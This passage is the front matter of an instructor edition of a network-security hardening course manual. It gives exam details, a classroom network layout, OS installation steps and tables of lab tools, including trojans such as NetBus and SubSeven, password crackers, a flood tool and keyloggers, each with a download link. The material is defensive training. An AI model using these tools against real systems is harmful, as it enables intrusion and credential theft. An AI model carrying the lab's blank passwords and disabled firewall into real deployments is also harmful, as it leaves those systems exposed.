APPENDIX A: HARDENING THE INFRASTRUCTURE EXAM OBJECTIVESExam Objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .543

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 20: SCNP Hardening

ABOUT THIS COURSEHardening the Infrastructure is designed to provide network administrators withan awareness of security-related issues and the essential skills they need to imple-ment security in a given network. It is the first course offered in the first level ofthe Security Certified Program.

The Security Certified Program (SCP)

Wherever you are in life, you will find that the people around you have certainskills that help position them in the fields they want to work in. Doctors, lawyers,engineers, and architects are just a few of the many examples. So it should be nosurprise that the computer and networking fields have come to create and fostercertifications to help individuals prove to employers, and themselves, that theymeet the required skills to perform adequately in their specific fields; be it theentry-level person beginning with a basic hardware repair technician certificationor the infrastructure expert heading for the highest level of router certification.

What is the Security Certified Program?

Ascendant Learning, a Chicago-based security training organization, has createdthe Security Certified Program (SCP) to help develop and validate your skills as acomputer and network security professional.

The SCP structure is unique as it measures competence in core security skills aswell as skills needed for specific security technologies, such as Packet Structureand Signature Analysis, Operating System Hardening, Router Security, Firewalls,Virtual Private Networks (VPNs), Intrusion Detection, Risk Analysis, Digital Sig-natures and Certificates, Biometrics, and Network Forensics.

The SCP certifications are comprised of two vendor-neutral security certifications.The first level of certification is the Security Certified Network Professional(SCNP), and the second level of certification is the Security Certified NetworkArchitect (SCNA).

ABOUT THISCOURSE

About This Course xix

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 21: SCNP Hardening

What is the SCNP?

The SCNP (Security Certified Network Professional) is SCP’s Level One certifi-cate, and it is primarily focused on defense. Level One deals with the protectivesecurity technologies in today’s enterprise environments—TCP Packet Analysis,Operating System Hardening, Router Security, Firewall Systems, Intrusion Detec-tion Systems (IDSs), Virus Protection, VPNs, and Disaster Recovery.

The SCNP is a certification track that will test your ability to configure and main-tain a secure networking environment.

What kind of experience do I need before I go for my SCNP?

Before you begin the SCNP certification track, it is recommended that, at a mini-mum, you attain CompTIA’s Security+ certification or have equivalent trainingwith hands-on experience. The SCNP training and certification builds on conceptsand skills covered in the Security+ certification.

How do I become SCNP-certified?

xx Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 22: SCNP Hardening

The SCNP certification is comprised of two exams, Hardening the Infrastructure(HTI), and Network Defense and Countermeasures (NDC). To become SCNP-certified, candidates must pass both of these Level One exams.

It is also recommended that candidates study the official courseware before takingthe exams.

What are the exams like?

The exams are multiple-answer, often scenario-based, tests. The HTI exam has 90questions, and the candidate has 90 minutes to complete the exam.

At the time of this publication, the exam breakdown was as follows.

Examination Domain Percentage of Exam1.0—Contingency Planning 52.0—Tools and Techniques 93.0—Security on the Internet and the WWW 114.0—Router Security and ACLs 155.0—TCP/IP Packet Structure and Security 256.0—Operating System Security 35Total 100

Note that SCP exams are updated regularly to reflect changes in the networksecurity industry. It is strongly recommended that potential candidates review theexam objectives at www.securitycertified.net/certifications.htm.

How do I take the exams?

The SCP exams are available at any Prometric or VUE Testing center, in over7,400 locations around the world.

There are several ways to register for an exam. To register for SCP exams overthe Internet, visit Prometric at www.2test.com or VUE at www.vue.com/it/, andcreate an account with the vendor of your choice (if you don’t already have one).

For International Exam Registration, please check with your preferred vendor’sWeb site for more information.

During the exam:

• Read questions carefully. Don’t jump to any conclusions!

• Skip questions that you are unsure of, and come back to them at the end.

• If you have time remaining, you will be given the opportunity to reviewyour answers. Be sure to do so, and make sure you didn’t make any obviousmistakes.

• If you come back to a question and are not sure about an answer, rememberthat your first hunch is more often correct than your second-choice answer(after overanalyzing the question)!

• Be sure to answer all questions; unanswered questions count against yourscore, so if you just don’t have an answer, try to eliminate any options thatyou know are wrong and make a best guess from whatever remains.

About This Course xxi

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 23: SCNP Hardening

On your exam day, try to arrive 15 minutes early so you do not feel rushed orstressed by being late. This will also give you a few minutes to review any notesbefore beginning your exam. However, as the SCP exams are closed-book, notesor calculators may not be brought into the testing station and will have to be leftwith the facility’s faculty.

How much do the exams cost?

The current price for Level One exams are $150 each (USD).

Will my certification expire?

Yes. As technologies in the security field are constantly changing, your certificatewill be valid for two years starting on the date you pass the second exam. SCNPswill need retake only the NDC exam before their SCNP certification expires.Candidates who are recertifying will be able to do so at a discounted exam rate.

What if I want to go further?

After you have become SCNP-certified and want to further your knowledge, youcan move on to the second level of the SCP track.

SCP’s Level Two deals with trust. Many enterprises are trying to integrate DigitalSignatures, Digital Certificates, and Biometric and Smart Card authentication sys-tems into their infrastructures. Trust, as it pertains to network security, is vital forbusinesses as they look to integrate their partners and suppliers into their businessstructures and provide real-time information and services to their customers.

Level Two is about the fundamentals of building a trusted network, strongauthentication techniques, encryption, biometrics, smart cards, and networkforensics. SCP Level Two includes two courses, PKI and Biometrics Conceptsand Planning (PBC), and PKI and Biometrics Implementation (PBI). Each courseis a 40-hour program, and the content and hands-on labs are structured to developthe skills required by today’s security experts.

To become a Security Certified Network Architect (SCNA), candidates must passtwo exams. The first is Advanced Security Implementation (ASI), and the secondis The Solution Exam (TSE); which will cover all facets of technologies coveredin all of the SCP courses.

How do I prepare for the exam?

The HTI exam will require that you be familiar with the many technologies andutilities that are covered in this book. Further, the test was authored with theintention that people who have not become familiar with the technologies andutilities covered will not find it as easy to pass the exam as those who have usedthe programs and technologies in question.

What does this all mean? It means that you really should use the utilities andprograms that are covered here, rather than just read about them. You shouldbecome very familiar with all of the tasks in this book. If possible, create a homelab with at least two machines, and practice—repeatedly—the hands-on tasks inthis book. Even using what you learn to help secure your own home networkfrom hosts on the Internet will help you prepare for the exam.

Studying for the exam:

1. Read the book from start to finish, completing all tasks even if you arefamiliar with the technology in question. You never know when some new

xxii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 24: SCNP Hardening

facet of a technology or program may be brought up, and many of the les-sons build upon the previous one. It is easy to miss something if you skiparound.

2. Be sure to complete all hands-on tasks. Again, the SCP exams are based onknowledge and hands-on experience. Once you have completed a task, trydoing it again.

3. Be sure to answer the Topic Review questions within each lesson. Make noteof the questions you answered incorrectly, and study the appropriate sectionsagain.

4. Before taking the SCP exams, it is recommended that you take the practiceexams available through MeasureUp. More information on officially recom-mended practice exams is available at www.securitycertified.net/practice_tests.htm.

But perhaps the best way to make sure that you reach your goal is to register forthe exam and stick to the date you set. Nothing keeps you on your toes andworking toward a goal like a deadline! Honestly measure your skills, make yourstudy schedule, set the date that you will be ready to take the exam, and registerfor it.

Practice exams

The only provider of practice exams authorized and recommended by the creatorsof the SCP is MeasureUp. Visit www.securitycertified.net/practice_tests.htm formore information.

Contact information

The Security Certified Program

U.S.: 800-869-0025

International: 630-472-5790

Email: [email protected]

Web site: www.SecurityCertified.Net

Course PrerequisitesTo ensure your success, we recommend you first take the following New Hori-zons courses or have equivalent knowledge:

• Network+ Certification - Third Edition—2002 Objectives, A CompTIA Certi-fication

• Security+ - A CompTIA Certification

Course ObjectivesWhen you’re done working your way through this course, you’ll be able to:

About This Course xxiii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 25: SCNP Hardening

• Investigate advanced concepts and procedures related to the TCP/IP protocol.

• Work with the secure version of IP, IPSec.

• Secure Linux computers and networks.

• Secure Windows 2000 computers and test the effectiveness of various secu-rity measures.

• Secure routers by using Access Control Lists and logging options.

• Investigate measures that can help ensure business continuity in the event ofa disaster, such as contingency planning and power and backup issues.

• Define common Internet components, and identify techniques used in Webhacking and other attacks.

• Examine and work with common techniques used to attack networks andspecific operating systems.

COURSE SETUP INFORMATIONHardware and Software RequirementsTo run this course, you will need:

• The hardware listed in the following table.

Hardware Type Quantity Minimum SpecificationsStudent machines 1 per student — 500 MHz Pentium III processor (700 MHz or higher

recommended).— 128 MB of RAM (256 MB or more recommended).— 8 GB hard disk.— Two non-integrated NICs (Intel or 3COM preferred—for

promiscuous mode support).— Video card (Nvidia TNT2 preferred—from the point of

view of driver availability for all OSs).Instructormachines

1 Same as student machines.

Cisco routers 3 2500 Series preferred; IOS 12.2 or greater, with IPSec/SSHsupport.

Cisco consolecables

1

Serial cables 2 DCE to DTE, for connecting routers together.Switches or hubs 2 10/100 Mbps.Hardwarekeylogger

1

Null-modem andcrossover cables

1 set for each pairof students

CAT 5.

Please read the CourseSetup information

thoroughly, and gather all ofthe hardware and software

listed here before youproceed with this installation.

xxiv Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 26: SCNP Hardening

• For class preparation and use, the following software:

— A bootable DOS floppy disk with common utilities such as FDISK, FOR-MAT, MSCDEX, DELPART, and so forth, is sufficient for class purposes.

— The Windows 2000 Server operating system. The cost of an evaluation copyis $7.95, and you can obtain the software from the Microsoft Training Kits,TechNet, or http://microsoft.order-2.com/win2kast.

— The Red Hat 8.0 Linux operating system. It does not matter if you use thePersonal or Professional Edition. The cost of this software is free, if youdownload it from www.redhat.com (or any of the various mirror sites listedthere). It is recommended that you also download the installation guide. Ifyou decide to download the OS from the Internet, download the ISO filesand create CDs from the images. Choosing the Burn As Image optionensures that the CDs will be bootable.

— Hardware drivers for each OS and peripheral, especially NIC and videodrivers. You should always keep these handy. In addition to having them ona CD, it is generally advisable to have a set of properly labeled floppy disks.

— Service Pack 2 for Windows 2000 Server. This Service Pack is free, and canbe downloaded from http://download.microsoft.com/download/win2000platform/SP/SP2/NT5/EN-US/W2KSP2.exe (save the file to disk).

— The Internet Explorer 6 upgrade. This upgrade is free, and can be down-loaded from www.microsoft.com/windows/ie/default.asp (you might needto be connected to the Internet to do the actual upgrade).

— The sysprep utility, from the Windows 2000 Resource Kit.

— Disk-cloning tools. Norton Ghost is recommended.

— SID-changing utilities. Norton Ghostwalk is recommended.

— For use in class, you will also need to acquire the tools and utilitiesdescribed in the following tables. Tables are arranged by function, such asnetwork scanning, firewalls, and so forth. Links are provided to enable youto download files from the Web, via an HTML version of these setupinstructions on the course CD. Create a Tools share (or a CD) for use inclass. Download and organize the tools in an appropriate folder structure,such as in folders named Linux Tools, Windows Tools, and Miscellaneous.The Miscellaneous folder can include utilities like MS Office file viewers,file unzippers, Adobe Acrobat Reader, and so forth. The capture and signa-ture files required for some of the tasks in the course, as well as all theRFCs, are included with each course manual.

Network Scanning Tools

Tool OS/CostUsed inTasks Download From

SuperScan Windows/Evalis Free

Yes www.foundstone.com/knowledge/scanning.html

Nmap Linux/Built-in Yes Included in Red Hat 8.0NmapFE Linux/Built-in Yes Included in Red Hat 8.0NmapNT Windows/Free No www.eeye.com/html/Research/Tools/nmapnt/

nmapNTsp1.zipPinger Windows/Free No http://visualsoftru.com/ping/pinger.exe

It is assumed that eacheducation center has aTechNet or MSDNsubscription and theWindows 2000 ResourceKit.

Be aware that these tablescontain tools and utilitiesthat are not specifically usedin the hands-on activities inthis course.

All links listed in thisdocument were last testedfor availability on February14, 2003.

About This Course xxv

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 27: SCNP Hardening

Tool OS/CostUsed inTasks Download From

Strobe Linux,Windows/Free

No For Linux, www.luyer.net/software/strobe-classb/

Nessus Linux/Free Yes ftp://ftp.nessus.org/pub/nessus/nessus-2.0.3/nessus-installer/nessus-installer.sh

udpflood.exe Windows/Free Yes www.foundstone.com/knowledge/stress_testing.html

NetScan ToolsPro

Windows/Evalis Free

No ftp://ftp.netscantools.com/pub/nst430a.zip

Netcat Linux,Windows/Free

Yes For Linux, included with Red Hat 8.0. ForWindows, www.atstake.com/research/tools/nc11nt.zip

Network Sniffer and Routing Tools

Tool OS/CostUsed inTasks Download From

NetworkMonitor

Windows/Built-in

Yes Included in Windows 2000 Server

Ethereal0.9.11

Windows,Linux/Free

Yes For Linux, included with Red Hat 8.0. ForWindows, www.ethereal.com/distribution/Win32

Tcpdump Linux/Free No www.tcpdump.org/Windump Windows/Free No http://windump.polito.it/install/default.htmWinPcap 2.3 Windows/Free Yes http://windump.polito.it/install/default.htmVisual Route Windows/Eval

is freeYes ftp://ftp.visualware.com/pub/vr/vr.exe

NeoTrace Windows/Evalis free

No www.tucows.com/preview/194046.html

Password Tools

Tool OS/CostUsed inTasks Download From

L0pht Crack2.5

Windows/Evalis Free

No www.32bit.bhs.com/downloads/file.asp?id=4519

L0pht CrackLC4

Windows/Evalis Free

Yes www.atstake.com/research/lc/application/lc4setup.exe

Crack 5.0 Linux/Free No ftp://ftp.openbsd.org/pub/OpenBSD/2.7/packages/i386/crack-5.0.tgz

John theRipper

Windows,Linux, DOS/Free

Yes (Linuxversion only)

For Linux, www.openwall.com/john/john-1.6.tar.gz For Windows, www.openwall.com/john/john-1.6w.zip

Snadboy’sRevelation

Windows/Free Yes www.snadboy.com/RevelationV2.zip

xxvi Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 28: SCNP Hardening

Trojan Horses and Exploit Tools

Tool OS/CostUsed inTasks Download From

Netbus Windows/Free No http://nttoolbox.com/public/tools/NetBus170.zip

NetBus Pro Windows/Free Yes http://home.t-online.de/home/TschiTschi/netbus_pro_eng.htm

SubSeven Windows/Free No www.subseven.ws/GetAdmin Windows NT/

FreeNo http://packetstormsecurity.org

Forensics and Keyboard Logging Tools

Tool OS/CostUsed inTasks Download or Order From

NTFSDOS Linux/Free,DOS/Eval isfree

Yes For DOS, www.sysinternals.com/files/ntfs30r.zip (The Read-only version will do.)For Linux, linux-ntfs.sourceforge.net/info/redhat.html#how

Keylogger Any (This ishardware.)/$89 to $199(one per classonly)

Yes www.keyghost.com

Securitykeyboard

Any (This ishardware.)/$129 to $299(one per classonly)

Yes www.keyghost.com

Keystrokelogger

Any (This ishardware.)/$54.95(one per classonly)

Yes www.electronickits.com/spy/finish/computer/key.htm

Klogger Windows/Free Yes http://ntsecurity.nu/cgi-bin/download/klogger.exe.pl

Intrusion Detection Tools

Tool OS/CostUsed inTasks Download From

ISS InternetScanner 6

Windows/Free No Included with the Windows 2000 ServerResource Kit, or you can visit: www.iss.net/download/

ISS SystemScanner 6

Windows/Free No Included with the Windows 2000 ServerResource Kit, or you can visit: www.iss.net/download/

Snort Linux,Windows/Free

No www.snort.org/dl/binaries

IDSCenter Windows/Free No www.snort.org/dl/contrib/front_ends

About This Course xxvii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 29: SCNP Hardening

Firewalls

Tool OS/CostUsed inTasks Download From

CheckPointNG

Windows2000 Serverwith SP2/$2000 approx.(one per classonly)

No www.checkpoint.com. Part number isCPFW-FM-25-NG.

ISAServer2000

Windows2000 with SP1min./Eval isFree

No www.microsoft.com/isaserver/evaluation/trial/default.asp

Network and Security Administration Tools

Tool OS/CostUsed inTasks Download From

IPv6TechnologyPreview

Windows/Free Yes http://msdn.microsoft.com/downloads/sdks/platform/tpipv6/download.asp

Webmin Any (browser-basedmanagement.)/Free

Yes www.webmin.com. Download either therpm or the tarball.

Tripwire Linux/Built-in Yes Included with Red Hat 8.0Bastille Linux/Free Yes http://osdn.dl.sourceforge.net/sourceforge/

bastille-linux/Bastille-2.0.4-1.0.i386.rpmpwlib-1.3.3-5.i386.rpm

Linux/Free Yes www.bastille-linux.org/pwlib-1.3.3-5.i386.rpm

perl-Tk-800.023-9mdk.i586.rpm

Linux/Free Yes www.bastille-linux.org/perl-Tk-800.023-9mdk.i586.rpm

Windows2000 GoldStandard

Windows/Free Yes www.cisecurity.org

PuTTY.exe Windows/Free Yes http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

HiSecWebsecuritytemplate

Windows/Free Yes http://download.microsoft.com/download/win2000srv/SCM/1.0/NT5/EN-US/hisecweb.exe

IIS Lockdowntool

Windows/Free Yes http:/download.microsoft.com/download/iis50/Utility/2.1/NT45XP/EN-US/iislockd.exe

xxviii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 30: SCNP Hardening

Tool OS/CostUsed inTasks Download From

HFNetChk tool Windows/Free Yes http://download.microsoft.com/download/win2000platform/Utility/3.3/NT45/EN-US/Nshc332.exe (For the original command-line tool, go to hfnetchk.shavlik.com/hfnetchk_3.86.0.1.exe. Or, for the newMicrosoft Baseline Security Analyzer, go todownload.microsoft.com/download/e/5/7/e57f498f-2468-4905-aa5f-369252f8b15c/mbsasetup.msi.)

Miscellaneous Tools

Tool OS/CostUsed inTasks Download From

File Unzippers Windows,DOS/Free

Yes www.winzip.com, www.pkware.com, orwww.rarlab.com

PDF Viewer Windows/Free No www.adobe.com/products/acrobat/readstep2.html

MS OfficeViewers

Windows/Free No http://office.microsoft.com/downloads/default.aspx

• For use in class, students will need the following:

— A bootable DOS floppy disk, similar to the one used for class preparation.

— Tools and utilities as described previously. These tools need to be down-loaded from the Web and can be burned onto a CD-ROM, placed in a sharedfolder on the classroom network, or copied onto the student machines.

Note: If you decide to create a Tools CD-ROM for use in class, make sure thatthe instructor collects the CD-ROMs from the students at the end of thecourse.

— The CD-ROM included with the course manual.

• For use in class, the instructor will need the following:

— A bootable DOS floppy disk, similar to the one used for class preparation.

— Tools and utilities as described previously. These tools need to be down-loaded from the Web, and can be burned onto a CD-ROM or copied onto theinstructor’s machine.

— The CD-ROM included with the course manual.

— A hardware keylogger.

Note: During class, the instructor does not need to have, but should haveaccess to, the disks used for class preparation.

Class RequirementsIn order for the class to run properly, perform the procedures described below.

About This Course xxix

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 31: SCNP Hardening

Before you begin actually setting up the class, here are some recommendationsfor classroom configuration and hardware preparation.

Recommendations for Hardware Preparation• The minimum hardware requirements are listed earlier in this course. It is

not advisable to use anything less.

• It is recommended that all the computers be of the same or similar hardwareconfiguration.

• If you do use computers with integrated motherboards and the video usesshared memory, we recommend you decrease the amount of shared memoryto 2 MB so that you have as much RAM available for the OS as possible.

• Configure the BIOS so that the boot order is 1: CD-ROM, 2: Floppy Drive,and 3: Hard Drive. Protect the student machine BIOSs with a password.

Classroom ConfigurationFigure 0-1 shows the recommended classroom configuration. Use this figure inconjunction with the IP addressing and naming schemes described in the follow-ing section.

Figure 0-1: The recommended classroom configuration includes 12 student computers and1 instructor computer.

IP Addressing and Computer Naming SchemeRefer to the class layout diagram shown in Figure 0-1. The chart in Figure 0-2shows the recommended IP addressing and computer-naming scheme. Use thispattern to develop addresses and names for additional machines as needed.

Estimated minimum timefor classroom setup (12

student machines and oneinstructor machine): 5

hours.

xxx Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 32: SCNP Hardening

The routers divide the classroom into two halves—LEFT and RIGHT—with theCENTER router controlled by the instructor. The LEFT side is configured forsubnet 172.16.0.0, the CENTER is on subnet 172.17.0.0 and the RIGHT side ison subnet 172.18.0.0. Students should be given the passwords for the LEFT andRIGHT routers but not for the CENTER router. In the chart, NIC 1 refers to thenetwork card that is connected to the classroom hub, and NIC 2 refers to the net-work card that is connected to the partner machine (via a crossover cable).

Part ofClassroom

Computer or Host Name IP Address and Default GatewayWindows 2000 Linux NIC 1 NIC 2

LEFT STU-W2K-L01 stulnxl01 IP: 172.16.10.1;DG: 172.16.0.1

IP: 172.26.10.1

STU-W2K-L02 stulnxl02 IP: 172.16.10.2;DG: 172.16.0.1

IP: 172.26.10.2

STU-W2K-L03 stulnxl03 IP: 172.16.10.3;DG: 172.16.0.1

IP: 172.26.10.3

RIGHT STU-W2K-R01 stulnxr01 IP: 172.18.10.1;DG: 172.18.0.1

IP: 172.28.10.1

STU-W2K-R02 stulnxr02 IP: 172.18.10.2;DG: 172.18.0.1

IP: 172.28.10.2

STU-W2K-R03 stulnxr03 IP: 172.18.10.3;DG: 172.18.0.1

IP: 172.28.10.3

CENTER INS-W2K-C01 inslnxc01 IP: 172.17.10.1;DG: 172.17.0.1

N/A

Figure 0-2: Classroom configuration scheme.

IMPORTANT: Overview of the Partitioning Scheme for an 8 GB Hard DriveBecause you will be installing more than one OS on each machine, it’s importantto set up the proper disk partition sizes. Fortunately, because of the OSs involved,you can do most of this partitioning as part of the installation routines for eachOS. See Figure 0-3 for a graphic rendition of the hard drive.

Figure 0-3: A visual representation of the hard drive partitioning required for this course.

Estimated minimum timefor partitioning andinstalling OSs on onemachine: 3 hours.

About This Course xxxi

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 33: SCNP Hardening

Another method to create a multi-boot machine is to install a host operating sys-tem such as Windows 2000 Professional, configure all the drivers, load VMwareon top of the host OS, then install Windows 2000 Server and Red Hat Linux 8.0as guest operating systems on top of the host OS. Note that this will require sub-stantial hardware resources.

Installing and Configuring Windows 2000 Server

1. Boot to DOS using a bootable DOS floppy disk (with utilities likedelpart.exe, fdisk.exe, format.exe, mscdex.exe, and so forth).

2. Run delpart and fdisk /mbr to clean out the hard drive’s partitions andMaster Boot Record.

3. Insert the installation CD-ROM for Windows 2000 Server, and boot toit. The Windows 2000 Server Setup screen is displayed.

4. Press Enter to specify that you want to perform a new install. The Windows2000 License Agreement is displayed.

5. Read the License Agreement, and then press F8 to accept the agreement.

6. When you are prompted for the location to use for setting up Windows, cre-ate a new partition of 2600 MB and specify this partition as the locationfor Windows 2000.

7. When you are prompted, specify that you do want the drive to be NTFSand press Enter. After the partition has been formatted and files copied, thecomputer will reboot.

8. At the Welcome To The Windows 2000 Server Setup Wizard screen, clickNext. Setup next detects and installs device drivers.

9. For Regional Settings, select your local settings, and then click Next.

10. At the Personalize Your Software screen, use student for the Name, andSCP for the Organization. Click Next.

11. If prompted, enter the product key and click Next.

12. In the Licensing Modes screen, select Per Seat and click Next. If youchoose Per Server, change the value to 99.

13. In the Computer Name and Administrator Password dialog box, leave theusername as Administrator, and specify the Computer Name as XXX-W2K-XXX. You will change the computer name on the cloned hard drivesafter the drives have been cloned. The student computers must use a blankpassword. (The Instructor machine can have a password, but the studentcomputers cannot). Once the password has been defined or left blank, asappropriate, click Next.

14. If a modem is detected (some integrated motherboards have onboardmodems, for example), enter the applicable area code and settings, andthen click Next.

Estimated minimum timefor Windows 2000 Server

installation andconfiguration: 1 hour, 30

minutes.

xxxii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 34: SCNP Hardening

15. In the Windows 2000 Components screen, select IIS, click Details, checkFTP, and click OK. Select Management And Monitoring Tools, clickDetails, check Network Monitor Tools, and click OK.

16. Click Next.

17. In the Date And Time Settings dialog box, enter the local settings andclick Next.

18. For Network Settings, select Typical Settings and click Next.

19. If prompted, configure the TCP/IP settings to use DHCP for now. Youwill configure these settings on the cloned hard drives later.

20. Specify that the computer is to be part of a Workgroup calledWorkgroup.

21. Click Next to enable the computer to perform the final installation tasks.This will take several minutes.

22. When the Completing The Windows 2000 Setup Wizard is displayed, clickFinish to complete the installation.

23. When the computer restarts, remove the installation CD-ROM, and log onto Windows 2000 as Administrator.

24. In the Configure Your Server dialog box, select I Will Configure ThisServer Later, and click Next. Uncheck Show This Screen At Startup, andthen close the Windows 2000 Configure Your Server window.

25. Insert the Windows 2000 Server CD-ROM, and copy the i386 folderfrom the CD-ROM to the partition where you installed Windows 2000.Then, remove the CD-ROM.

26. Copy the file w2ksp2.exe to the partition where you installed Windows2000, and double-click it to install Service Pack 2.

27. Accept all defaults for the Service Pack installation, and reboot whenyou are prompted to do so.

28. After the reboot, log on as Administrator, copy the file ie6setup.exe to theWindows 2000 boot partition, and run the program to upgrade to IE 6.

29. If the machines you plan to use in class have the same general hardwareconfiguration, install any necessary drivers so that they will be copied tothe cloned hard drives.

30. Open the Display Properties, select the Settings tab, and change thescreen resolution to be at least 800 by 600 pixels.

31. Start Windows Explorer, select the C drive (or the drive letter that cor-responds to the Windows 2000 boot partition), and choose View→Details.

Choose View→Choose Columns, check Attributes, and click OK.

About This Course xxxiii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 35: SCNP Hardening

Choose Tools→Folder Options. Under Web View, select Use WindowsClassic Folders, and click Apply.

In the Folder Options dialog box, select the View tab, check the first threecheck boxes, select Show Hidden Files And Folders, uncheck the next sixcheck boxes, and click Apply. Then, click the Like Current Folder but-ton, click Yes to close the Folder Views information box, and click OK toclose the Folder Options dialog box.

32. Close Explorer.

33. Use the Start→Programs→Accessories menu to open a commandprompt, right-click its title bar, and choose Properties. Select the Layouttab, uncheck Let System Position Window, and change the settings asshown in the following table.

Setting Width HeightScreen Buffer Size 90 4000Window Size 90 42Window Position 48 0

Click OK, select Modify Shortcut That Started This Window, and clickOK. Close the command prompt.

34. Use the Run dialog box to open a command prompt. Modify this com-mand prompt’s Layout properties similarly to the previous step. ClickOK, select Save Properties For Future Windows With Same Title, andclick OK. Then close the command prompt.

35. Right-click the Taskbar and choose Properties. Uncheck Use Personal-ized Menus and click OK.

36. If you are not supplying the Windows 2000 tools on a CD-ROM or sharedfolder, copy the Windows 2000 tools to the Windows 2000 boot partition.

37. Run the Sysprep utility. Do not boot to Windows 2000 again until afteryou have cloned or multicast the hard drives.

Installing and Configuring Red Hat 8.0 LinuxYou can find a complete installation manual at www.redhat.com/docs/manuals/linux/RHL-8.0-Manual/install-guide.

1. Insert the Red Hat Linux 8.0 Disc 1 into your CD-ROM drive and bootto it. An installation routine screen with several options is displayed.

2. Press Enter to perform the install in GUI mode.

3. If necessary, use the Tab key to select Skip, and press Enter to skip thetest on the CD media.

4. While the anaconda installer runs for a few minutes, please wait at thispoint.

5. When you are presented with the Welcome GUI, click Next.

Estimated minimum timefor Red Hat 8.0 Linux

installation andconfiguration: 1 hour, 30

minutes.

xxxiv Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 36: SCNP Hardening

6. Accept the default Language selection settings, and click Next.

7. Accept the default Keyboard selection settings, and click Next.

8. Verify that the default Mouse selection settings are accurate, and clickNext.

9. For the Installation Type, select Custom. Do not select Server—it will wipeout and take over your hard drive. Click Next.

10. Select Manually Partition With Fdisk and click Next. You can use DiskDruid if you prefer, but these instructions list only the steps for using fdisk.

11. Click the button for your hard drive. If you have only one IDE hard drivethat’s set to Master, you will see the button labeled as hda. Watch out withthis option—make sure you’re creating the install on a machine that is repre-sentative of your classroom.

12. Verify that the next screen has an explanation of the fdisk options forLinux in the left pane. The commands can be entered in the right pane.

13. Enter p to see the partition table. Primary partitions are numbered 1 through4. One of these Primary partitions can be created as an Extended partition.Logical drives within the Extended partition are numbered from 5 onward.

14. Create an extended partition to hold the Linux logical partitions. To dothis:

a. Enter n to create a new partition.

b. Enter e to specify that you want to create an Extended partition.

c. Enter 2 to specify the Partition Number.

d. For the first cylinder, press Enter.

e. Enter 1023 to specify the last cylinder.

f. Enter p to display the partition table again.

15. Create a logical drive of 100 MB for the /boot partition. To do this:

a. Enter n to create a new partition.

b. Enter l to specify that you want to create a logical drive partition.

c. If prompted, specify the partition number as the next available; thisshould be 5.

d. For the first cylinder, press Enter.

e. For the last cylinder enter +100M to create a logical drive of 100 MB.

16. Create a swap space of 256 MB. To do this:

a. Enter n to specify that you want to create a new partition.

b. Enter l to specify that you want to create a logical drive partition.

c. If prompted, specify the partition number as the next available; thisshould be 6.

d. For the first cylinder, press Enter.

e. For the last cylinder enter +256M to create a logical drive of 256 MB.

About This Course xxxv

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 37: SCNP Hardening

17. Create a logical drive for the rest of the space (approximately 5+ GB).To do this:

a. Enter n to specify that you want to create a new partition.

b. Enter l to specify that you want to create a logical drive partition.

c. If prompted, specify the partition number as the next available; thisshould be 7.

d. For the first cylinder, press Enter.

e. For the last cylinder press Enter again to allocate all remaining spacein the extended partition for this logical drive

18. Enter p to see the updated partition table. Verify that the three logicaldrives—named hda5, hda6, and hda7—are displayed, and that the parti-tion type (in Hex code) is Type 83 for the three logical drives you justcreated.

19. Make the 256 MB partition (logical drive 6) a swap partition. To do this:

a. Enter t to specify that you want to change a partition’s type.

b. For the partition number, specify the number for this partition (itshould be 6).

c. For Hex code, enter 82 to assign this partition to be the swap space.

20. Verify that you have the right partition types by viewing the partitiontable before you write to it (enter p to view). tmp/hda6 should be listed asLinux Swap.

21. Enter w to commit to this partition table. When you are returned to the Par-titioning With Fdisk screen, click Next.

22. If you see a popup informing you that a partition type 82h has to be format-ted as a Linux swap partition, and asking if you would like to do so, clickYes.

23. Double-click the 100 MB partition, and assign it to the /boot mountpoint. To do this:

a. Select the Format Partition As ext3 radio button.

b. Click the drop-down button for Mount Point.

c. Select /boot and click OK.

24. Double-click the 5+ GB partition, and assign it to the / mount point. Todo this:

a. Select the Format Partition As ext3 radio button.

b. Click the drop-down button for Mount Point.

c. Select / and click OK.

25. Click Next. If you see a popup titled Format Warnings, click Format.

26. In the Boot Loader configuration screen, accept the default boot loaderGRUB.

xxxvi Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 38: SCNP Hardening

27. Change the label for the dos partition and make it the default bootdrive, by selecting it and clicking Edit, changing the label to read Win-dows 2000, checking Default Boot Target, and clicking OK. (This is whatyou will see later in the startup screen.) Click Next.

28. Specify that you do not wish to activate the network interface(s) at boot.When you image this hard drive and boot to Linux, each machine will take along time to discover that there are no DHCP servers around.

29. Manually set the hostname to xxxlnxxxx (no hyphens or spaces).

30. Leave the miscellaneous settings alone for now, and click Next. You canconfigure these settings after imaging the hard drives. Click Continue toclear any warning messages you might receive.

31. For Security Level, select No Firewall, and click Next.

32. Accept the default language selection, and click Next.

33. Select the appropriate Time Zone and Daylight Savings Time, whereapplicable. Click Next.

